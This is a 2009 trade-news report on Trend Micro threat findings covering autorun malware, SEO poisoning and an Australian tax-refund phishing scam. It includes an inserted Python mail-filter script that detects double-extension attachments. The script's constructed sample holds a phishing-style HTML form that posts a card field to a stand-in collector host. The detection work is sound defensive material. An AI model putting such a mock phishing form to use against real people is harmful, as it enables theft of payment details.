'Autorun malware emerge most dangerous'

CIOL Bureau
NEW DELHI, INDIA: Trend Micro researchers have detected that in the first two quarters of 2009, most Asian countries have autorun malware as their top infectors, the highest concentration compared to other regions in the world.

Autorun malware mainly spreads through removable devices.

Trend Micro research uncovered two variants of the MAL_OTORUN malware that manifest behavior and characteristics that are similar to computer worms that exploit autorun vulnerabilities in the Windows operating system. The malware may go undetected by an unsuspecting user and be downloaded unknowingly when visiting malicious Web sites.

The malware relies on the autorun or autoplay feature in Windows XP and Vista. This feature enables removable media such as CDs and removable drives to start automatically upon insertion or connection to the system.

MAL_OTORUN1 and MAL_OTORUN2 usually infect computers by dropping a copy of themselves on physical and removable drives. The number of infections in Asia-Pacific amounted to 92,773,402 and 127,902,379 respectively since 2008.

Malware related to online games also increased in the second quarter of 2009, especially in China. Because China has a large online gaming population, it showed a high percentage of game-related spyware.

Another growing trend among cybercriminals is the use of search engine optimization (SEO) techniques, through which they push popular news items into search engines so that they appear as top search results. In reality, the results are malicious links to harmful Web sites.

In the past months, cybercriminals took advantage of the rumors surrounding Michael Jackson’s death or the H1N1 flu pandemic to end up among the top search results in all major search engines. “All these Web searches yielded links that triggered multiple redirections to various malicious sites, which ultimately led to the download of rogue antivirus software. We advise users to be very careful when clicking links in top search results in major search engines,” commented Amit Nath, Country Manager, India & SAARC, Trend Micro.

As for spam, one significant phishing attack put Australian taxpayers at risk of having their personal details stolen by cybercriminals. Spammers used a phishing e-mail that posed as the latest call from the Australian Taxation Office (ATO) for people to lodge their 2008 tax returns. The e-mail leads the recipient to believe that he or she is eligible for a tax refund, then asks the recipient to fill in the form attached to the e-mail, click the Print button, and send it to the head office.

The form uses a double extension, .PDF.HTM, which tricks users into thinking that they are filling in a PDF file. In reality, the attachment is an HTML page that connects to a malicious site. Oddly enough, the form asks for the user’s credit card number and PIN code, which would be irrelevant to a genuine tax return.
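
A mail-filter check for the double-extension trick described above, as an added example that is not part of the original article or of any Trend Micro product: it flags attachments whose name ends in a document-like extension followed by an active one, and lists the remote URLs an HTML attachment references. The extension lists, function names, sample message and `.example` addresses are constructed assumptions.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumed extension lists for this example; tune them to local mail policy.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg"}
ACTIVE_EXTS = {"htm", "html", "hta", "js", "vbs", "exe", "scr"}
# Absolute URLs in attributes that make an HTML file contact a remote host.
REMOTE_REF = re.compile(r'(?:action|src|href)\s*=\s*["\']?(https?://[^\s"\'>]+)', re.I)

def double_extension(filename):
    """Return (decoy, real) when a document-like extension precedes an active one."""
    # Windows ignores trailing dots and spaces, so strip them before splitting.
    parts = filename.lower().rstrip(". ").split(".")
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS and parts[-1] in ACTIVE_EXTS:
        return parts[-2], parts[-1]
    return None

def audit_message(raw_bytes):
    """List attachments with a deceptive double extension and, for HTML, the URLs they reference."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        hit = double_extension(name)
        if hit is None:
            continue
        urls = []
        if hit[1] in ("htm", "html"):
            body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
            urls = REMOTE_REF.findall(body)
        findings.append({"filename": name, "decoy": hit[0], "real": hit[1], "remote_urls": urls})
    return findings

def build_sample():
    """Constructed message: one disguised HTML form, one ordinary PDF attachment."""
    msg = EmailMessage()
    msg["Subject"] = "Tax refund notification"
    msg["From"] = "refunds@tax-office.example"
    msg["To"] = "user@example.org"
    msg.set_content("Please complete the attached form.")
    html = '<form action="http://collector.example/submit" method="post"><input name="card"></form>'
    msg.add_attachment(html, subtype="html", filename="refund_form.pdf.htm")
    msg.add_attachment(b"%PDF-1.4 constructed", maintype="application", subtype="pdf", filename="receipt.pdf")
    return msg.as_bytes()

if __name__ == "__main__":
    for finding in audit_message(build_sample()):
        print(finding)
```

The check keys on the file name rather than the declared MIME type, since the name is what the recipient sees.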

The volume and sophistication of these threats make it imperative that multilayered, real-time protection is used to ensure online safety. The Trend Micro Smart Protection Network, which powers most of Trend Micro's products and solutions, correlates Web and e-mail threat data by using reputation technologies that compare threats against in-the-cloud threat databases. This unique type of cloud-client security infrastructure gives Trend Micro customers real-time protection against the latest Internet threats, while enjoying online activities to the fullest.
